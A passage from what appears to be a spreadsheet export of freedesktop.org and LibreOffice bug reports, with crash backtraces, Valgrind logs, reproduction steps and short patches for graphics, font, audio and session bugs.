#1  0x00007fbbf0ad0240 in SvTreeListBox::FillAccessibleEntryStateSet (this=0x314b3b0 pEntry=0x0 rStateSet=...) at /media/FreeAgent-3/LibreOffice-onegit/core/svtools/source/contnr/svtreebx.cxx:2451
#2  0x00007fbbcf4ab40e in accessibility::AccessibleListBoxEntry::getAccessibleStateSet (this=0x3255800) at /media/FreeAgent-3/LibreOffice-onegit/core/accessibility/source/extended/accessiblelistboxentry.cxx:449
#3  0x00007fbbe6cde5cc in atk_object_wrapper_new (rxAccessible=... parent=0x0) at /media/FreeAgent-3/LibreOffice-onegit/core/vcl/unx/gtk/a11y/atkwrapper.cxx:822
#4  0x00007fbbe6cde2ec in atk_object_wrapper_ref (rxAccessible=... create=true) at /media/FreeAgent-3/LibreOffice-onegit/core/vcl/unx/gtk/a11y/atkwrapper.cxx:765
#5  0x00007fbbe6ccb186 in getObjFromAny (rAny=uno::Any { = {_vptr.XInterface = 0x3255860} }) at /media/FreeAgent-3/LibreOffice-onegit/core/vcl/unx/gtk/a11y/atklistener.cxx:109
#6  0x00007fbbe6ccbc4f in AtkListener::notifyEvent (this=0x3254bf0 aEvent=...) at /media/FreeAgent-3/LibreOffice-onegit/core/vcl/unx/gtk/a11y/atklistener.cxx:356
#7  0x00007fbbf24540dc in comphelper::AccessibleEventNotifier::addEvent(unsigned int com::sun::star::accessibility::AccessibleEventObject const&amp;) () from /media/FreeAgent-3/LibreOffice-onegit/core/INSTALL_LINK/program/libcomphelpgcc3.so
#8  0x00007fbbf2452f83 in comphelper::OAccessibleContextHelper::NotifyAccessibleEvent(short com::sun::star::uno::Any const&amp; com::sun::star::uno::Any const&amp;) () from
in the second frame the pEntry being NULL of course was causing the core dump. The fact the core dump only happens ( for me ) when accessibility was turned on was a bit of a red herring as was this stack itself. It turns out that the core here is a side affect of other badness that happened earlier. Valgrind trace shows
SvTreeListBox::FillAccessibleEntryStateSet pEntry 0x2ec2d000
==27033== Invalid read of size 2
==27033==    at 0x2997DF5E: ScRangeData::HasType(unsigned short) const (rangenam.hxx:175)
==27033==    by 0x29F844EF: ScNameDlg::UpdateChecks(ScRangeData*) (namedlg.cxx:273)
==27033==    by 0x29F84C91: ScNameDlg::ShowOptions(ScRangeNameLine const&amp;) (namedlg.cxx:337)
==27033==    by 0x29F85876: ScNameDlg::SelectionChanged() (namedlg.cxx:470)
==27033==    by 0x29F85F13: ScNameDlg::SelectionChangedHdl_Impl(void*) (namedlg.cxx:572)
==27033==    by 0x29F85EF4: ScNameDlg::LinkStubSelectionChangedHdl_Impl(void* void*) (namedlg.cxx:570)
==27033==    by 0x7ABE65D: Link::Call(void*) const (link.hxx:140)
==27033==    by 0x7B2CB73: SvLBox::SelectHdl() (svlbox.cxx:843)
==27033==    by 0x7B3CC93: SvTreeListBox::Select(SvLBoxEntry* unsigned char) (svtreebx.cxx:1013)
==27033==    by 0x7B1A6A1: SvImpLBox::SetCursor(SvLBoxEntry* unsigned char) (svimpbox.cxx:661)
==27033==    by 0x7B21F10: ImpLBSelEng::SetCursorAtPoint(Point const&amp; unsigned char) (svimpbox.cxx:2773)
==27033==    by 0x93E781D: SelectionEngine::SelMouseButtonDown(MouseEvent const&amp;) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==  Address 0x188c7780 is not stack'd malloc'd or (recently) free'd
==27033== 
==27033== Invalid read of size 2
==27033==    at 0x2997DF5E: ScRangeData::HasType(unsigned short) const (rangenam.hxx:175)
==27033==    by 0x29F84518: ScNameDlg::UpdateChecks(ScRangeData*) (namedlg.cxx:274)
==27033==    by 0x29F84C91: ScNameDlg::ShowOptions(ScRangeNameLine const&amp;) (namedlg.cxx:337)
==27033==    by 0x29F85876: ScNameDlg::SelectionChanged() (namedlg.cxx:470)
==27033==    by 0x29F85F13: ScNameDlg::SelectionChangedHdl_Impl(void*) (namedlg.cxx:572)
==27033==    by 0x29F85EF4: ScNameDlg::LinkStubSelectionChangedHdl_Impl(void* void*) (namedlg.cxx:570)
==27033==    by 0x7ABE65D: Link::Call(void*) const (link.hxx:140)
==27033==    by 0x7B2CB73: SvLBox::SelectHdl() (svlbox.cxx:843)
==27033==    by 0x7B3CC93: SvTreeListBox::Select(SvLBoxEntry* unsigned char) (svtreebx.cxx:1013)
==27033==    by 0x7B1A6A1: SvImpLBox::SetCursor(SvLBoxEntry* unsigned char) (svimpbox.cxx:661)
==27033==    by 0x7B21F10: ImpLBSelEng::SetCursorAtPoint(Point const&amp; unsigned char) (svimpbox.cxx:2773)
==27033==    by 0x93E781D: SelectionEngine::SelMouseButtonDown(MouseEvent const&amp;) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==  Address 0x188c7780 is not stack'd malloc'd or (recently) free'd
==27033== 
==27033== Invalid read of size 2
==27033==    at 0x2997DF5E: ScRangeData::HasType(unsigned short) const (rangenam.hxx:175)
==27033==    by 0x29F84541: ScNameDlg::UpdateChecks(ScRangeData*) (namedlg.cxx:275)
==27033==    by 0x29F84C91: ScNameDlg::ShowOptions(ScRangeNameLine const&amp;) (namedlg.cxx:337)
==27033==    by 0x29F85876: ScNameDlg::SelectionChanged() (namedlg.cxx:470)
==27033==    by 0x29F85F13: ScNameDlg::SelectionChangedHdl_Impl(void*) (namedlg.cxx:572)
==27033==    by 0x29F85EF4: ScNameDlg::LinkStubSelectionChangedHdl_Impl(void* void*) (namedlg.cxx:570)
==27033==    by 0x7ABE65D: Link::Call(void*) const (link.hxx:140)
==27033==    by 0x7B2CB73: SvLBox::SelectHdl() (svlbox.cxx:843)
==27033==    by 0x7B3CC93: SvTreeListBox::Select(SvLBoxEntry* unsigned char) (svtreebx.cxx:1013)
==27033==    by 0x7B1A6A1: SvImpLBox::SetCursor(SvLBoxEntry* unsigned char) (svimpbox.cxx:661)
==27033==    by 0x7B21F10: ImpLBSelEng::SetCursorAtPoint(Point const&amp; unsigned char) (svimpbox.cxx:2773)
==27033==    by 0x93E781D: SelectionEngine::SelMouseButtonDown(MouseEvent const&amp;) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==  Address 0x188c7780 is not stack'd malloc'd or (recently) free'd
==27033== 
==27033== Invalid read of size 8
==27033==    at 0x7B25310: SvTreeList::GetParent(SvListEntry*) const (treelist.hxx:628)
==27033==    by 0x7B255FD: SvLBox::GetParent(SvLBoxEntry*) const (svlbox.hxx:434)
==27033==    by 0x7B2DAB4: SvLBox::FillEntryPath(SvLBoxEntry* std::deque &gt;&amp;) const (svlbox.cxx:1281)
==27033==    by 0x23EB9402: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libacclo.so)
==27033==    by 0x23EB2977: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libacclo.so)
==27033==    by 0x82FBB68: VCLXAccessibleComponent::WindowEventListener(VclSimpleEvent*) (vclxaccessiblecomponent.cxx:147)
==27033==    by 0x82FBA8E: VCLXAccessibleComponent::LinkStubWindowEventListener(void* void*) (vclxaccessiblecomponent.cxx:132)
==27033==    by 0x919DB51: VclEventListeners::Call(VclSimpleEvent*) const (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==    by 0x941AF29: Window::CallEventListeners(unsigned long void*) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==    by 0x7B41C6C: SvTreeListBox::CallImplEventListeners(unsigned long void*) (svtreebx.cxx:2480)
==27033==    by 0x7B24AA7: SvImpLBox::CallEventListeners(unsigned long void*) (svimpbox.cxx:3532)
==27033==    by 0x7B3CCAF: SvTreeListBox::Select(SvLBoxEntry* unsigned char) (svtreebx.cxx:1014)
==27033==  Address 0x1fde78d8 is 8 bytes inside a block of size 72 free'd
==27033==    at 0x4C2562E: operator delete(void*) (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==27033==    by 0x7B2BA13: SvLBoxEntry::~SvLBoxEntry() (svlbox.cxx:578)
==27033==    by 0x7B55CD2: SvTreeList::Remove(SvListEntry*) (treelist.cxx:1313)
==27033==    by 0x7B2D62A: SvLBox::RemoveSelection() (svlbox.cxx:1154)
==27033==    by 0x29F88809: ScRangeManagerTable::DeleteSelectedEntries() (namemgrtable.cxx:187)
==27033==    by 0x29F852B8: ScNameDlg::NameModified() (namedlg.cxx:420)
==27033==    by 0x29F85E71: ScNameDlg::EdModifyHdl(void*) (namedlg.cxx:560)
==27033==    by 0x29F85E52: ScNameDlg::LinkStubEdModifyHdl(void* void*) (namedlg.cxx:558)
==27033==    by 0x91BB2AD: Control::ImplCallEventListenersAndHandler(unsigned long Link const&amp; void*) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==    by 0x29E11D0E: CheckBox::Check(unsigned char) (button.hxx:489)
==27033==    by 0x29F844DE: ScNameDlg::UpdateChecks(ScRangeData*) (namedlg.cxx:272)
==27033==    by 0x29F84C91: ScNameDlg::ShowOptions(ScRangeNameLine const&amp;) (namedlg.cxx:337)
==27033== 
SvTreeListBox::FillAccessibleEntryStateSet pEntry (nil)
==27033== Invalid read of size 2
==27033==    at 0x7B253BE: SvLBoxEntry::HasChildrenOnDemand() const (svlbox.hxx:213)
==27033==    by 0x7B41A99: SvTreeListBox::FillAccessibleEntryStateSet(SvLBoxEntry* utl::AccessibleStateSetHelper&amp;) const (svtreebx.cxx:2451)
==27033==    by 0x23EBAA16: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libacclo.so)
==27033==    by 0x12954433: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvclplug_gtklo.so)
==27033==    by 0x12954153: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvclplug_gtklo.so)
==27033==    by 0x12940909: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvclplug_gtklo.so)
==27033==    by 0x129413D2: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvclplug_gtklo.so)
==27033==    by 0x62BD0DB: comphelper::AccessibleEventNotifier::addEvent(unsigned int com::sun::star::accessibility::AccessibleEventObject const&amp;) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libcomphelpgcc3.so)
==27033==    by 0x62BBF82: comphelper::OAccessibleContextHelper::NotifyAccessibleEvent(short com::sun::star::uno::Any const&amp; com::sun::star::uno::Any const&amp;) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libcomphelpgcc3.so)
==27033==    by 0x23EB2A23: ??? (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libacclo.so)
==27033==    by 0x82FBB68: VCLXAccessibleComponent::WindowEventListener(VclSimpleEvent*) (vclxaccessiblecomponent.cxx:147)
==27033==    by 0x82FBA8E: VCLXAccessibleComponent::LinkStubWindowEventListener(void* void*) (vclxaccessiblecomponent.cxx:132)
==27033==  Address 0x40 is not stack'd malloc'd or (recently) free'd
==27033== 
it appears the 
==27033== Invalid read of size 2
==27033==    at 0x2997DF5E: ScRangeData::HasType(unsigned short) const (rangenam.hxx:175)
==27033==    by 0x29F84518: ScNameDlg::UpdateChecks(ScRangeData*) 
is saying that the ScRangeData* has been changed under the hood
this part from the bottom of the valgrind log 
==27033==  Address 0x1fde78d8 is 8 bytes inside a block of size 72 free'd
==27033==    at 0x4C2562E: operator delete(void*) (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==27033==    by 0x7B2BA13: SvLBoxEntry::~SvLBoxEntry() (svlbox.cxx:578)
==27033==    by 0x7B55CD2: SvTreeList::Remove(SvListEntry*) (treelist.cxx:1313)
==27033==    by 0x7B2D62A: SvLBox::RemoveSelection() (svlbox.cxx:1154)
==27033==    by 0x29F88809: ScRangeManagerTable::DeleteSelectedEntries() (namemgrtable.cxx:187)
==27033==    by 0x29F852B8: ScNameDlg::NameModified() (namedlg.cxx:420)
==27033==    by 0x29F85E71: ScNameDlg::EdModifyHdl(void*) (namedlg.cxx:560)
==27033==    by 0x29F85E52: ScNameDlg::LinkStubEdModifyHdl(void* void*) (namedlg.cxx:558)
==27033==    by 0x91BB2AD: Control::ImplCallEventListenersAndHandler(unsigned long Link const&amp; void*) (in /media/FreeAgent-3/LibreOffice-onegit/core/solver/unxlngx6.pro/lib/libvcllo.so)
==27033==    by 0x29E11D0E: CheckBox::Check(unsigned char) (button.hxx:489)
==27033==    by 0x29F844DE: ScNameDlg::UpdateChecks(ScRangeData*) 
gives the real hint the selection changed event calls somewhere down it's stack 'ScNameDlg::UpdateChecks' which in turn modifies a checkbox ( which triggers another handler ) as these handlers are asynchronous and the SelectionHandler can call code the modifies the internal structures that both handlers use we get problems. Afaict 'ScNameDlg::UpdateChecks' should never trigger the event handlers for the checkboxes whose state it modifes as it is just syncing the state controls with that of the internal model.</t>
  </si>
  <si>
    <t>WAYLAND-77649</t>
  </si>
  <si>
    <t>desktop-shell does not properly handle seats that are initialized after the shell.</t>
  </si>
  <si>
    <t>The problem is that the desktop shell does not properly attach to the signals of seats that get added after the shell is initialized.  This results in xdg_surface.[de]activate events not being sent to clients when running under the RDP or Wayland backends.</t>
  </si>
  <si>
    <t>XORG-2142</t>
  </si>
  <si>
    <t>X server logs font path all one one very long unreadable line.</t>
  </si>
  <si>
    <t>The X server logs the complete fontpath to the log however it is
all on one very long line which is rather unreadable.
(**) FontPath set to
/usr/X11R6/lib/X11/fonts/75dpi:unscaled/usr/X11R6/lib/X11/fonts/misc:unscaled/usr/X11R6/lib/X11/fonts/misc/usr/X11R6/lib/X11/fonts/Speedo/usr/X11R6/lib/X11/fonts/TTF/usr/X11R6/lib/X11/fonts/Type1/usr/X11R6/lib/X11/fonts/hanyang/usr/share/fonts/default/Type1/usr/share/fonts/ko/saemmul/usr/share/fonts/hanyang
A nice minor enhancement to break this up on FPE boundaries would make the
font path more readable and also help to spot font path related issues
in bug reports.
Something like:
(**) FontPath set to:
        /usr/X11R6/lib/X11/fonts/75dpi:unscaled
        /usr/X11R6/lib/X11/fonts/misc:unscaled
        /usr/X11R6/lib/X11/fonts/misc
        /usr/X11R6/lib/X11/fonts/Speedo
        /usr/X11R6/lib/X11/fonts/TTF
        /usr/X11R6/lib/X11/fonts/Type1
        /usr/X11R6/lib/X11/fonts/hanyang
        /usr/share/fonts/default/Type1
        /usr/share/fonts/ko/saemmul
        /usr/share/fonts/hanyang
If nobody objects I'll create a patch to do this and commit to CVS.</t>
  </si>
  <si>
    <t>XDG-USER-DIRS-38876</t>
  </si>
  <si>
    <t>[PATCH] Run gtk updater in Unity too</t>
  </si>
  <si>
    <t>Unity is a registered XDG environment [1].  Unity uses xdg-user-dirs-gtk-update
so the .desktop file should add it to its OnlyShowIn value.
This isn't particularly relevant this second but will be once the patch in GNOME bug 653440 lands.
[1] http://standards.freedesktop.org/menu-spec/latest/apb.html</t>
  </si>
  <si>
    <t>michael.terry</t>
  </si>
  <si>
    <t>XORG-68554</t>
  </si>
  <si>
    <t>libXi doesn't handle XI2.1 requests properly</t>
  </si>
  <si>
    <t>XIAllowEvents changed request lengths in XI 2.2. A client calling XIQueryVersion 2.1 is expected 
If a client registers for XI 2.1 is expected to use the original (shorter) request a client for XI 2.2 is expected to use the new request length.
libXi decides the request length on the server-supported version not on the one the client uses. This causes a BadLength error in the server.</t>
  </si>
  <si>
    <t>MESA-99209</t>
  </si>
  <si>
    <t>[EGL i965] dEQP-EGL.functional.sharing.gles2.multithread.simple_egl_server_sync.textures.copyteximage2d_texsubimage2d_render</t>
  </si>
  <si>
    <t>Test: dEQP-EGL.functional.sharing.gles2.multithread.simple_egl_server_sync.textures.copytexi
mage2d_texsubimage2d_render
The test fails consistently for me even when the refcount bugfix in 99085 [1] is applied. It also fails when ran under gdb. Surprisingly the test consistently *PASSES* when ran under helgrind.
Setup:
    mesa: master@d6545f2                                                      
    deqp: nougat-cts-dev@4acf725 with local patches
    deqp-target: x11_egl
    hw: Intel Broadwell 0x1616
[1]: https://bugs.freedesktop.org/show_bug.cgi?id=99085</t>
  </si>
  <si>
    <t>WAYLAND-60610</t>
  </si>
  <si>
    <t>Some windows appear to have larger input reigons then they appear</t>
  </si>
  <si>
    <t>It seems that mostly with xwayland windows and with the nested compositor (compositor-wayland) that the input regions expand a good number of pixels past the visible output of the window.
I can see this as if I have an xwayland window in the foreground which is overlapping another window and I try to activate the window near the border of the active xwayland window the window stays active until I move the cursor further away from the border I can finally activate it.</t>
  </si>
  <si>
    <t>MESA-770</t>
  </si>
  <si>
    <t>Hangs with chromium using CVS as of 20040531</t>
  </si>
  <si>
    <t>I'm using a system with the following:
- X.Org release 6.7.0
- libGL from X.Org CVS head 20040620 (to support new DRI drivers due to bug 709)
- DRI drivers from Mesa CVS 20040531.
- radeon.ko 1.11.0 from FreeBSD-current
While most things work I was able to hang the machine twice using chromium. 
Once was while testing render acceleration with Chromium running and doing an ls
-lR in a terminal and the following messages were logged.
/var/log/messages:Jun 19 12:41:58 anholt kernel: error:
[drm:pid1368:radeon_check_and_fixup_packets] *ERROR* Invalid R200 cubic texture
offset
/var/log/messages-Jun 19 12:41:58 anholt kernel: error:
[drm:pid1368:radeon_emit_packets] *ERROR* Packet verification failed
/var/log/messages-Jun 19 12:41:58 anholt kernel: error:
[drm:pid1368:radeon_cp_cmdbuf] *ERROR* radeon_emit_packets failed
/var/log/messages:Jun 19 12:42:00 anholt kernel: error:
[drm:pid1369:radeon_check_and_fixup_packets] *ERROR* Invalid R200 cubic texture
offset
/var/log/messages-Jun 19 12:42:00 anholt kernel: error:
[drm:pid1369:radeon_emit_packets] *ERROR* Packet verification failed
/var/log/messages-Jun 19 12:42:00 anholt kernel: error:
[drm:pid1369:radeon_cp_cmdbuf] *ERROR* radeon_emit_packets failed
Then I tried with Render accel disabled and was able to hang the system this
time without the messages by running two chromiums and a fire demo at once.
Any clues?</t>
  </si>
  <si>
    <t>FONTCONFIG-85</t>
  </si>
  <si>
    <t>Addition of Hebrew calmus font to default fonts.conf</t>
  </si>
  <si>
    <t>The Hebrew calmus fonts should be added to the sans the serif and the
monospace sections as follows:
     serif: FrankRuehl
     sans:  Nachlieli
     monospace: Miriam Mono
Note that due to a bug in the font Nimbus Mono L (see
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=90501) it is necessary that
Miriam Mono is placed before Nimbus Mono L.</t>
  </si>
  <si>
    <t>dov</t>
  </si>
  <si>
    <t>FONTCONFIG-96676</t>
  </si>
  <si>
    <t>Check range of FcWeightFromOpenType argument.</t>
  </si>
  <si>
    <t>Created attachment 124719
patch to fix this issue
The argument to FcWeightToOpenType is already properly upper bounded
but the same check should be done in FcWeightFromOpenType too.
This fixes an out of boundary access while iterating over array on
malicious font input.</t>
  </si>
  <si>
    <t>BUSTLE-38672</t>
  </si>
  <si>
    <t>Migrate to GtkBuilder when Oneiric is released</t>
  </si>
  <si>
    <t>The latest version of Gtk2hs namely 0.12 supports GtkBuilder. Relatedly the latest version of Glade is buggy and refuses to read libglade-format files. So I can't edit the user interface any more.
Sadly Ubuntu Natty does not have Gtk2hs 0.12. Oneiric does. I think it's worth supporting Natty so sadly GtkBuilder-ification will have to wait.</t>
  </si>
  <si>
    <t>PULSEAUDIO-89934</t>
  </si>
  <si>
    <t>Does not switch to USB headset anymore</t>
  </si>
  <si>
    <t>After upgrading to Fedora 22 (not yet released) when I plug in my USB headset audio is still routed to to the system mic and speakers. I have to manually switch from the gnome audio panel.
On IRC it was suggested to report this upstream
paolo@murdock ~/dcv $ pulseaudio --version
pulseaudio 6.0
paolo@murdock ~/dcv $ rpm -qa | grep pulseaudio
pulseaudio-libs-glib2-6.0-2.fc22.x86_64
pulseaudio-utils-6.0-2.fc22.x86_64
pulseaudio-module-x11-6.0-2.fc22.x86_64
pulseaudio-6.0-2.fc22.x86_64
pulseaudio-libs-devel-6.0-2.fc22.x86_64
alsa-plugins-pulseaudio-1.0.29-1.fc22.x86_64
pulseaudio-libs-6.0-2.fc22.i686
pulseaudio-module-bluetooth-6.0-2.fc22.x86_64
pulseaudio-libs-6.0-2.fc22.x86_64
pulseaudio-gdm-hooks-6.0-2.fc22.x86_64
paolo@murdock ~/dcv $</t>
  </si>
  <si>
    <t>MESA-10529</t>
  </si>
  <si>
    <t>Incorrect lighting/clipping in Neverwinter Nights</t>
  </si>
  <si>
    <t>Eversince xorg-server 1.2.0 and Mesa 6.5.2 (both requirements of xorg-x11 7.2) I have a strange issue with Neverwinter Nights (native Linux client version - patched to latest).
The issue is hard to explain but I will try. If someone wants a screenshot I can forward. Basically it looks like the gamma correction is off (everything has a bright glow). However if I zoom in (camera changes) then the image begins to appear correct. It's almost as if the 3D engine isn't properly setting/reading the correct coordinates for lighting and camera or something.
As well the field of view for objects in the distance seems to be clipped too close rather than being in the distance. 
To verify this is not related to xf86-video-intel driver or xorg-server 1.2.0 I have tried various versions of both and no change. However if I keep latest intel driver latest xorg-server and downgrade mesa to 6.5.1 the problem goes away (when it loads the i915_dri.so from Mesa 6.5.1). 
I have tried the latest GIT versions of Mesa xorg-server x11-drm intel agp for kernel and the intel video driver. No luck in correcting the problem.
Also when using all GIT versions with i915tex_dri.so enabled Neverwinter Nights loads but none of the text appears in the main menu and some of the grapics/images do no show or are partially loaded/cut off.
Can anyone help determine what is broken here? Something changed from 6.5.1 -&gt; 6.5.(2|3).</t>
  </si>
  <si>
    <t>roderick_greening</t>
  </si>
  <si>
    <t>XORG-18319</t>
  </si>
  <si>
    <t>[830M EXA] render accel broken on 830</t>
  </si>
  <si>
    <t>Created attachment 19972
Xorg log
This is on a Gentoo x86 Dell X200 laptop running xorg-server 1.5.2 linux 2.6.27 and xf86-video-intel 2.5.0.
With previous versions there had been minor corruption on some parts of the screen temporarily and very occasionally it would lock up.
With 2.5.0 the entire screen is corrupted and looks like a very colorful static.  You can make out some things on the screen faintly.  The xserver hard locks after trying to type some.
Kernel log output:
[drm] Initialized drm 1.1.0 20060810
pci 0000:00:02.0: PCI INT A -&gt; Link[LNKA] -&gt; GSI 10 (level low) -&gt; IRQ 10
pci 0000:00:02.0: setting latency timer to 64
[drm] Initialized i915 1.6.0 20060119 on minor 0
pci 0000:00:02.1: setting latency timer to 64
[drm] Initialized i915 1.6.0 20060119 on minor 1
[drm:i915_getparam] *ERROR* Unknown parameter 5
I've attached the Xorg log as well.</t>
  </si>
  <si>
    <t>murraytony</t>
  </si>
  <si>
    <t>DRI-97824</t>
  </si>
  <si>
    <t>[BDW BYT KBL] [Regression] pm_rps / reset fails</t>
  </si>
  <si>
    <t>Created attachment 126560
BDW--pm_rps-reset--output
Platform: NUC5i7RYB
CPU: Intel(R) Core(TM) i7-5557U CPU @ 3.10GHz (Family 6 Model 61 Stepping 4)
Motherboard version: H73774-102
GPU: IntelÂ® Irisâ„¢ Graphics 6100 - Intel Corporation Broadwell-U Integrated Graphics (rev 09)
Memory: two 4GB card Kingston 99U5469-045.A00LF
SSD: INTEL SSDSC2KW24
Software
Bios: RYBDWi35.86A.0358.2016.0606.1423 from https://downloadcenter.intel.com/downloads/eula/26081/BIOS-Update-RYBDWi35-86A-?httpDown=https%3A%2F%2Fdownloadmirror.intel.com%2F26081%2Feng%2FRY0358.bio
Linux distribution: Ubuntu 16.04 64 bits
Kernel: 4.8.0-rc5 bef9c1f from http://cgit.freedesktop.org/drm-intel/
  commit bef9c1f4afe24cfff578d386bde349add65673eb
  Author: Joonas Lahtinen 
  Date:   Mon Sep 12 11:35:34 2016 +0300
  drm-intel-nightly: 2016y-09m-12d-08h-35m-02s UTC integration manifest
libdrm-2.4.70-12 2d00869 from git://anongit.freedesktop.org/mesa/drm
mesa: mesa-11.2.2 3a9f628 from git://anongit.freedesktop.org/mesa/mesa
cairo 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
xorg-server-1.18.0-549 527c6ba from git://git.freedesktop.org/git/xorg/xserver
xf86-video-intel 2.99.917-703 15c5ff1 from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
libva-1.7.0-47 2ebf897 from git://git.freedesktop.org/git/vaapi/libva 
vaapi-intel-driver: 1.7.0-117 8c11f51 from git://git.freedesktop.org/git/vaapi/intel-driver
Intel-Gpu-Tools 1.16 f565b6c from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git
Steps:
------
1. Execute IGT test:
# pm_rps --r reset
Actual result:
---------------
1. Test fails
Expected result:
----------------
1. Test is Pass
Regression:
-----------
Test was Pass with:
Kernel: 4.8.0-rc4 9baa666 from http://cgit.freedesktop.org/drm-intel/
  commit 9baa666b3e48f71b46c5f63541f57d2a95a1b1c0
  Author: Chris Wilson 
  Date:   Sat Sep 3 13:12:38 2016 +0100
  drm-intel-nightly: 2016y-09m-03d-12h-12m-15s UTC integration manifest
libdrm-2.4.70-6 4462303 from git://anongit.freedesktop.org/mesa/drm
mesa: mesa-11.2.2 3a9f628from git://anongit.freedesktop.org/mesa/mesa
cairo 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
xorg-server-1.18.0-546 deae9c7 from git://git.freedesktop.org/git/xorg/xserver
xf86-video-intel 2.99.917-701 205146b from git://git.freedesktop.org/git/xorg/driver/xf86-video-intel
libva-1.7.0-47 2ebf897 from git://git.freedesktop.org/git/vaapi/libva 
vaapi-intel-driver: 1.7.0-95 1817bee from git://git.freedesktop.org/git/vaapi/intel-driver
Intel-Gpu-Tools 1.16 6bd4208 from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git</t>
  </si>
  <si>
    <t>LIBREOFFICE-35779</t>
  </si>
  <si>
    <t>Automatic color does not work for the notes view</t>
  </si>
  <si>
    <t>In preparing a presentation with a black background and white text
I changed just the background to color picking Black for the master slide.
The slide text automatically switches to white then which is nice.
However on the notes view this automatic text color does not work and the slide text cannot be read. 
Workaround:
I had to manually set the text color to White on the master slide for being able to proceed</t>
  </si>
  <si>
    <t>gwidion</t>
  </si>
  <si>
    <t>POLICYKIT-80767</t>
  </si>
  <si>
    <t>[patches] Warning cleanups</t>
  </si>
  <si>
    <t>... just because Iâ€™m compulsive about a clean build.  This series fixes various Coverity- and Eclipse- reported problems and ugliness.
(Can easily enough wait after the next release.)</t>
  </si>
  <si>
    <t>DRI-27035</t>
  </si>
  <si>
    <t>[vblank suspend/resume] glxgears window black after resuming (S3 and S4) or switching VT back</t>
  </si>
  <si>
    <t>Created attachment 33978
Screenshot showing the problem
Platform:       G45
Mesa:           (7.8)54af54277a7a469ed2b9821ef6ed7ed464381f91
Xserver:        (master)f2eacb4646beb25d055de22868f93e6b24f229b6
Xf86_video_intel:(master)318aa9ed799197810e2039dbe3ec51559dcc888c
Libdrm:         (master)04fd3872ee8bd8d5e2c27740508c67c2d51dbc11
Kernel:  (master)60b341b778cc2929df16c0a504c91621b3c6a4ad
Bug detailed description:
-------------------------
Start glxgears on gnome desktop then do S4(Suspend/resume from disk). After system restore glxgears stop printing info like fps and glxgears window is black. It works well on X window(don't start gnome). This issue happens on all platform. It is regression. It works fine with code on January 18th. I will bisect this on next week.
Reproduce steps:
----------------
1.Start X and gnome-session 
2.run glxgears
3.echo disk &gt; /sys/power/state
4.press power button to restore</t>
  </si>
  <si>
    <t>XCB-9119</t>
  </si>
  <si>
    <t>we should test xcb_popcount</t>
  </si>
  <si>
    <t>xcb_popcount is low-hanging fruit for the XCB test suite. We should pluck it.</t>
  </si>
  <si>
    <t>POPPLER-44659</t>
  </si>
  <si>
    <t>Segmentation fault of pdfunite on certain files</t>
  </si>
  <si>
    <t>Created attachment 55403
gdb backtrace
There are some files that make pdfunite to segfault (backtrace attached). The crash is reproducible w/ either pdfunite 0.18.2 or built from today's git (master).
The following patch fixes the crash:
diff --git a/poppler/GlobalParams.cc b/poppler/GlobalParams.cc
index df9cc06..b82869b 100644
--- a/poppler/GlobalParams.cc
+++ b/poppler/GlobalParams.cc
@@ -1197 +1197 @@ extern XpdfPluginVecTable xpdfPluginVecTable
 //------------------------------------------------------------------------
-GlobalParams *globalParams = NULL
+GlobalParams *globalParams = new GlobalParams(0)
 //------------------------------------------------------------------------
 // DisplayFontParam
(indeed it introduces a memory leak).
Steps to reproduce:
% cp a.pdf b.pdf
% pdfunite a.pdf b.pdf c.pdf
The bug is reproducible w/ http://web.archive.org/web/20090122061701/http://www.free-culture.cc/freeculture.pdf or other files generated w/ certain versions of Acrobat Distiller (Acrobat Distiller 5.0.5 for Macintosh or Acrobat Distiller 8.1.0 (Windows) for example).</t>
  </si>
  <si>
    <t>asolokha</t>
  </si>
  <si>
    <t>SYSTEMD-57887</t>
  </si>
  <si>
    <t>After running su user/session looses active state</t>
  </si>
  <si>
    <t>I'm running Gentoo and systemd 196.
When I run 'su' in a terminal under KDE and switch to root my normal user and user's session looses the active state and switches to online. And so my normal user looses all device file permissions. After exit the su mode the state is still online.
Last know working version was 193. Could't test intermediate versions because of bug #55656.
Before 'su':
$ loginctl show-session 1
Id=1
Timestamp=So 2012-12-02 23:27:45 CET
TimestampMonotonic=4397266
DefaultControlGroup=name=systemd:/user/arne/1
VTNr=7
Display=:0
Remote=no
Service=kde-np
Leader=301
Audit=1
Type=x11
Class=user
Active=yes
State=active
KillProcesses=no
IdleHint=no
IdleSinceHint=0
IdleSinceHintMonotonic=0
Name=arne
$ loginctl show-user 1000
UID=1000
GID=1000
Name=arne
Timestamp=So 2012-12-02 23:27:45 CET
TimestampMonotonic=4390137
